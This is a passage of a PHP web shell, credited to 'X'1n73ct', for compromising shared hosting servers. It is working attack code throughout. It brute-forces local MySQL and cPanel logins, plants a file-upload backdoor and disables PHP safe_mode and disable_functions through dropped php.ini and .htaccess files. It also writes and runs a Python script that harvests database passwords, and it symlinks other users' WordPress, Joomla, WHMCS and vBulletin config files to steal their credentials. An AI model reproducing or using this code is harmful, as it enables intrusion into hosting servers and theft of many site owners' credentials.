        Recoded By X'1n73ct
        */
        @set_time_limit(0);
        @error_reporting(0);
        if ($_POST['page'] == 'find') {
            if (isset($_POST['usernames']) && isset($_POST['passwords'])) {
                if ($_POST['type'] == 'passwd') {
                    $e = explode("\n", $_POST['usernames']);
                    foreach ($e as $value) {
                        $k = explode(":", $value);
                        $username .= $k['0'] . " ";
                    }
                } elseif ($_POST['type'] == 'simple') {
                    $username = str_replace("\n", ' ', $_POST['usernames']);
                }
                $a1 = explode(" ", $username);
                $a2 = explode("\n", $_POST['passwords']);
                $id2 = count($a2);
                $ok = 0;
                foreach ($a1 as $user) {
                    if ($user !== '') {
                        $user = trim($user);
                        for ($i = 0; $i <= $id2; $i++) {
                            $pass = trim($a2[$i]);
                            if (@mysql_connect('localhost', $user, $pass)) {
                                echo "X'1n73ct~ user is (<b><font color=green>{$user}</font></b>) Password is (<b><font color=green>{$pass}</font></b>)<br />";
                                $ok++;
                            }
                        }
                    }
                }
                echo "<hr><b>You Found <font color=green>{$ok}</font> Cpanel by x'1n73ct</b>";
                echo "<center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
                exit;
            }
        }
        if ($_POST['pass'] == 'password') {
            @error_reporting(0);
            $i = getenv('REMOTE_ADDR');
            $d = date('D, M jS, Y H:i', time());
            $h = $_SERVER['HTTP_HOST'];
            $dir = $_SERVER['PHP_SELF'];
            $back = "PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCmlmKEBjb3B5KCRfRklMRVNbJ2ZpbGUnXVsndG1wX25hbWUnXSwgJF9GSUxFU1snZmlsZSddWyduYW1lJ10pKSB7IGVjaG8gJzxiPktvcmFuZyBEYWggQmVyamF5YSBVcGxvYWQgU2hlbGwgS29yYW5nISEhPGI+PGJyPjxicj4nOyB9DQplbHNlIHsgZWNobyAnPGI+S29yYW5nIEdhZ2FsIFVwbG9hZCBTaGVsbCBLb3JhbmchISE8L2I+PGJyPjxicj4nOyB9DQp9DQo/Pg==";
            $file = fopen(".php", "w+");
            $write = fwrite($file, "<?php\r\necho '<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">';\r\necho '<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>';\r\nif( \$_POST['_upl'] == \"Upload\" ) {\r\nif(@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Korang Dah Berjaya Upload Shell Korang!!!<b><br><br>'; }\r\nelse { echo '<b>Korang Gagal Upload Shell Korang!!!</b><br><br>'; }\r\n}\r\n?>");
            fclose($file);
            chmod(".php", 0755);
            mkdir('config', 0755);
            $cp = 'IyEvdXNyL2Jpbi9lbnYgcHl0aG9uDQoNCicnJw0KQnk6IEFobWVkIFNoYXdreSBha2EgbG54ZzMzaw0KdGh4OiBPYnp5LCBSZWxpaywgbW9oYWIgYW5kICNhcmFicHduIA0KJycnDQoNCmltcG9ydCBzeXMNCmltcG9ydCBvcw0KaW1wb3J0IHJlDQppbXBvcnQgc3VicHJvY2Vzcw0KaW1wb3J0IHVybGxpYg0KaW1wb3J0IGdsb2INCmZyb20gcGxhdGZvcm0gaW1wb3J0IHN5c3RlbQ0KDQppZiBsZW4oc3lzLmFyZ3YpICE9IDM6DQogIHByaW50JycnCQ0KIFVzYWdlOiAlcyBbVVJMLi4uXSBbZGlyZWN0b3J5Li4uXQ0KIEV4KSAlcyBodHRwOi8vd3d3LnRlc3QuY29tL3Rlc3QvIFtkaXIgLi4uXScnJyAlIChzeXMuYXJndlswXSwgc3lzLmFyZ3ZbMF0pDQogIHN5cy5leGl0KDEpDQoNCnNpdGUgPSBzeXMuYXJndlsxXQ0KZm91dCA9IHN5cy5hcmd2WzJdDQoNCnRyeToNCiAgcmVxICA9IHVybGxpYi51cmxvcGVuKHNpdGUpDQogIHJlYWQgPSByZXEucmVhZCgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAndycpDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZiA9IG9wZW4oJ2RhdGEudHh0JywgJ3cnKSAgDQogICAgZi53cml0ZShyZWFkKQ0KICAgIGYuY2xvc2UoKQ0KDQogIGkgPSAwDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgZiA9IG9wZW4oJy90bXAvZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBmID0gb3BlbignZGF0YS50eHQnLCAnclUnKQ0KICAgIGZvciBsaW5lIGluIGY6DQogICAgICBpZiBsaW5lLnN0YXJ0c3dpdGgoJzxsaT48YScpID09IFRydWUgOg0KICAgICAgICBtID0gcmUuc2VhcmNoKHInKDxhIGhyZWY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0uZ3JvdXAoMiksIGxvY2FsX25hbWUpDQogICAgICAgIGV4Y2VwdCBJT0Vycm9yOg0KICAgICAgICAgIHByaW50ICdcblslc10gZG9lc25cJ3QgZXhpc3QsIGNyZWF0ZSBpdCBmaXJzdCcgJSBmb3V0DQogICAgICAgICAgc3lzLmV4aXQoKQ0KICAgICAgaWYgbGluZS5zdGFydHN3aXRoKCc8aW1nJykgPT0gVHJ1ZToNCiAgICAgICAgbTEgPSByZS5zZWFyY2gocicoPGEgaHJlZj0iKSguK1tePl0pKCI+KScsIGxpbmUpDQogICAgICAgIGkgKz0gMQ0KICAgICAgICBsb2NhbF9uYW1lID0gJyVzL2ZpbGUlZC50eHQnICUgKGZvdXQsIGkpDQogICAgICAgIHByaW50ICdSZXRyaWV2aW5nLi4uXHRcdCcsIHNpdGUgKyBtMS5ncm91cCgyKQ0KICAgICAgICB0cnk6ICB1cmxsaWIudXJscmV0cmlldmUoc2l0ZSArIG0xLmdyb3VwKDIpLCBsb2NhbF9uYW1lKQ0KICAgICAgICBleGNlcHQgSU9FcnJvcjoNCiAgICAgICAgICBwcmludCAnXG5bJXNdIGRvZXNuXCd0IGV4aXN0LCBjcmVhdGUgaXQgZmlyc3QnICUgZm91dA0KICAgICAgICAgIHN5cy5leGl0KCkNCiAgICAgIGlmIGxpbmUuc3RhcnRzd2l0aCgnPElNRycpID09IFRydWU6DQogICAgICAgIG0yID0gcmUuc2VhcmNoKHInKDxBIEhSRUY9IikoLitbXj5dKSgiPiknLCBsaW5lKQ0KICAgICAgICBpICs9IDENCiAgICAgICAgbG9jYWxfbmFtZSA9ICclcy9maWxlJWQudHh0JyAlIChmb3V0LCBpKQ0KICAgICAgICBwcmludCAnUmV0cmlldmluZy4uLlx0XHQnLCBzaXRlICsgbTIuZ3JvdXAoMikNCiAgICAgICAgdHJ5OiAgdXJsbGliLnVybHJldHJpZXZlKHNpdGUgKyBtMi5ncm91cCgyKSwgbG9jYWxfbmFtZSkNCiAgICAgICAgZXhjZXB0IElPRXJyb3I6DQogICAgICAgICAgcHJpbnQgJ1xuWyVzXSBkb2VzblwndCBleGlzdCwgY3JlYXRlIGl0IGZpcnN0JyAlIGZvdXQNCiAgICAgICAgICBzeXMuZXhpdCgpDQogICAgZi5jbG9zZSgpDQogIGlmIHN5c3RlbSgpID09ICdMaW51eCc6DQogICAgY2xlYW51cCA9IHN1YnByb2Nlc3MuUG9wZW4oJ3JtIC1yZiAvdG1wL2RhdGEudHh0ID4gL2Rldi9udWxsJywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIGlmIHN5c3RlbSgpID09ICdXaW5kb3dzJzoNCiAgICBjbGVhbnVwID0gc3VicHJvY2Vzcy5Qb3BlbignZGVsIEM6XGRhdGEudHh0Jywgc2hlbGw9VHJ1ZSkud2FpdCgpDQogIHByaW50ICdcbicsICctJyAqIDEwMCwgJ1xuJw0KICBpZiBzeXN0ZW0oKSA9PSAnTGludXgnOg0KICAgIGZvciByb290LCBkaXJzLCBmaWxlcyBpbiBvcy53YWxrKGZvdXQpOg0KICAgICAgZm9yIGZuYW1lIGluIGZpbGVzOg0KICAgICAgICBmdWxscGF0aCA9IG9zLnBhdGguam9pbihyb290LCBmbmFtZSkNCiAgICAgICAgZiA9IG9wZW4oZnVsbHBhdGgsICdyJykNCiAgICAgICAgZm9yIGxpbmUgaW4gZjoNCiAgICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3IgaXMgbm90IE5vbmU6IHByaW50IChzZWNyLmdyb3VwKDIpKSAgDQogICAgICAgICAgc2VjcjEgPSByZS5zZWFyY2gociIocGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3IyID0gcmUuc2VhcmNoKHIiKERCX1BBU1NXT1JEJykoLi4uKSguK1tePl0pKCcpIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyMiBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3IyLmdyb3VwKDMpKQ0KICAgICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjMgaXMgbm90IE5vbmU6IHByaW50IChzZWNyMy5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNCA9IHJlLnNlYXJjaCAociIoREJQQVNTV09SRCA9ICcpKC4rW14+XSkoLjspIiwgbGluZSkNCiAgICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICAgIHNlY3I1ID0gcmUuc2VhcmNoIChyIihEQnBhc3MgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjUgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNS5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgICAgaWYgc2VjcjYgaXMgbm90IE5vbmU6IHByaW50IChzZWNyNi5ncm91cCgyKSkNCiAgICAgICAgICBzZWNyNyA9IHJlLnNlYXJjaCAociIobW9zQ29uZmlnX3Bhc3N3b3JkID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICAgIGYuY2xvc2UoKQ0KICBpZiBzeXN0ZW0oKSA9PSAnV2luZG93cyc6DQogICAgZm9yIGluZmlsZSBpbiBnbG9iLmdsb2IoIG9zLnBhdGguam9pbihmb3V0LCAnKi50eHQnKSApOg0KICAgICAgZiA9IG9wZW4oaW5maWxlLCAncicpDQogICAgICBmb3IgbGluZSBpbiBmOg0KICAgICAgICBzZWNyID0gcmUuc2VhcmNoIChyIihkYl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
            $file = fopen("cp.py", "w+");
            $write = fwrite($file, "#!/usr/bin/env python\r\n\r\n'''\r\nBy: Ahmed Shawky aka lnxg33k\r\nthx: Obzy, Relik, mohab and #arabpwn \r\n'''\r\n\r\nimport sys\r\nimport os\r\nimport re\r\nimport subprocess\r\nimport urllib\r\nimport glob\r\nfrom platform import system\r\n\r\nif len(sys.argv) != 3:\r\n  print'''\t\r\n Usage: %s [URL...] [directory...]\r\n Ex) %s http://www.test.com/test/ [dir ...]''' % (sys.argv[0], sys.argv[0])\r\n  sys.exit(1)\r\n\r\nsite = sys.argv[1]\r\nfout = sys.argv[2]\r\n\r\ntry:\r\n  req  = urllib.urlopen(site)\r\n  read = req.read()\r\n  if system() == 'Linux':\r\n    f = open('/tmp/data.txt', 'w')\r\n    f.write(read)\r\n    f.close()\r\n  if system() == 'Windows':\r\n    f = open('data.txt', 'w')  \r\n    f.write(read)\r\n    f.close()\r\n\r\n  i = 0\r\n  if system() == 'Linux':\r\n    f = open('/tmp/data.txt', 'rU')\r\n    for line in f:\r\n      if line.startswith('<li><a') == True :\r\n        m = re.search(r'(<a href=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m.group(2)\r\n        try:  urllib.urlretrieve(site + m.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n      if line.startswith('<img') == True:\r\n        m1 = re.search(r'(<a href=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m1.group(2)\r\n        try:  urllib.urlretrieve(site + m1.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n      if line.startswith('<IMG') == True:\r\n        m2 = re.search(r'(<A HREF=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m2.group(2)\r\n        try:  urllib.urlretrieve(site + m2.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n    f.close()\r\n  if system() == 'Windows':\r\n    f = open('data.txt', 'rU')\r\n    for line in f:\r\n      if line.startswith('<li><a') == True :\r\n        m = re.search(r'(<a href=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m.group(2)\r\n        try:  urllib.urlretrieve(site + m.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n      if line.startswith('<img') == True:\r\n        m1 = re.search(r'(<a href=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m1.group(2)\r\n        try:  urllib.urlretrieve(site + m1.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n      if line.startswith('<IMG') == True:\r\n        m2 = re.search(r'(<A HREF=\")(.+[^>])(\">)', line)\r\n        i += 1\r\n        local_name = '%s/file%d.txt' % (fout, i)\r\n        print 'Retrieving...\\t\\t', site + m2.group(2)\r\n        try:  urllib.urlretrieve(site + m2.group(2), local_name)\r\n        except IOError:\r\n          print '\\n[%s] doesn\\'t exist, create it first' % fout\r\n          sys.exit()\r\n    f.close()\r\n  if system() == 'Linux':\r\n    cleanup = subprocess.Popen('rm -rf /tmp/data.txt > /dev/null', shell=True).wait()\r\n  if system() == 'Windows':\r\n    cleanup = subprocess.Popen('del C:\\data.txt', shell=True).wait()\r\n  print '\\n', '-' * 100, '\\n'\r\n  if system() == 'Linux':\r\n    for root, dirs, files in os.walk(fout):\r\n      for fname in files:\r\n        fullpath = os.path.join(root, fname)\r\n        f = open(fullpath, 'r')\r\n        for line in f:\r\n          secr = re.search (r\"(db_password'] = ')(.+[^>])(';)\", line)\r\n          if secr is not None: print (secr.group(2))  \r\n          secr1 = re.search(r\"(password = ')(.+[^>])(';)\", line)\r\n          if secr1 is not None:  print  (secr1.group(2))\r\n          secr2 = re.search(r\"(DB_PASSWORD')(...)(.+[^>])(')\", line)\r\n          if secr2 is not None: print (secr2.group(3))\r\n          secr3 = re.search (r\"(dbpass =..)(.+[^>])(.;)\", line)\r\n          if secr3 is not None: print (secr3.group(2))\r\n          secr4 = re.search (r\"(DBPASSWORD = ')(.+[^>])(.;)\", line)\r\n          if secr4 is not None: print (secr4.group(2))\r\n          secr5 = re.search (r\"(DBpass = ')(.+[^>])(';)\", line)\r\n          if secr5 is not None: print (secr5.group(2))\r\n          secr6 = re.search (r\"(dbpasswd = ')(.+[^>])(';)\", line)\r\n          if secr6 is not None: print (secr6.group(2))\r\n          secr7 = re.search (r\"(mosConfig_password = ')(.+[^>])(';)\", line)\r\n          if secr7 is not None: print (secr7.group(2))\r\n        f.close()\r\n  if system() == 'Windows':\r\n    for infile in glob.glob( os.path.join(fout, '*.txt') ):\r\n      f = open(infile, 'r')\r\n      for line in f:\r\n        secr = re.search (r\"(db_password'] = ')(.+[^>])(';)\", line)\r\n        if secr is not None: print (secr.group(2))  \r\n        secr1 = re.search(r\"(password = ')(.+[^>])(';)\", line)\r\n        if secr1 is not None:  print  (secr1.group(2))\r\n        secr2 = re.search(r\"(DB_PASSWORD')(...)(.+[^>])(')\", line)\r\n        if secr2 is not None: print (secr2.group(3))\r\n        secr3 = re.search (r\"(dbpass =..)(.+[^>])(.;)\", line)\r\n        if secr3 is not None: print (secr3.group(2))\r\n        secr4 = re.search (r\"(DBPASSWORD = ')(.+[^>])(.;)\", line)\r\n        if secr4 is not None: print (secr4.group(2))\r\n        secr5 = re.search (r\"(DBpass = ')(.+[^>])(';)\", line)\r\n        if secr5 is not None: print (secr5.group(2))\r\n        secr6 = re.search (r\"(dbpasswd = ')(.+[^>])(';)\", line)\r\n        if secr6 is not None: print (secr6.group(2))\r\n        secr7 = re.search (r\"(mosConfig_password = ')(.+[^>])(';)\", line)\r\n        if secr7 is not None: print (secr7.group(2))\r\n      f.close()\r\nexcept (KeyboardInterrupt):\r\n  print '\\nThanks for using it ._^'");
            fclose($file);
            chmod("cp.py", 0755);
            $url = $_POST['url'];
            echo "<center>\r\n<textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
            system("python cp.py {$url} config");
            unlink('cp.py');
            echo "</textarea>\r\n</center>";
            echo "<hr><center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
            exit;
        }
        if ($_POST['matikan'] == 'sekatan') {
            @error_reporting(0);
            $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
            $file = fopen("php.ini", "w+");
            $write = fwrite($file, "safe_mode=OFF\r\ndisable_functions=NONE");
            fclose($file);
            $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
            $file = fopen(".htaccess", "w+");
            $write = fwrite($file, "Options FollowSymLinks MultiViews Indexes ExecCGI");
            echo "<hr><center><b>DONE!";
            echo "<hr><center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
            exit;
        }
        if ($_POST['mendapatkan'] == 'passwd') {
            @set_magic_quotes_runtime(0);
            ob_start();
            error_reporting(0);
            @set_time_limit(0);
            @ini_set('max_execution_time', 0);
            @ini_set('output_buffering', 0);
            $fn = $_POST['foldername'];
            //all function here
            function syml($usern, $pdomain)
            {
                symlink('/home/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home2/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home2/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home2/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home2/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home2/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home2/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home2/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home2/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home2/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home2/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home2/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home2/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home2/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home2/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home2/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
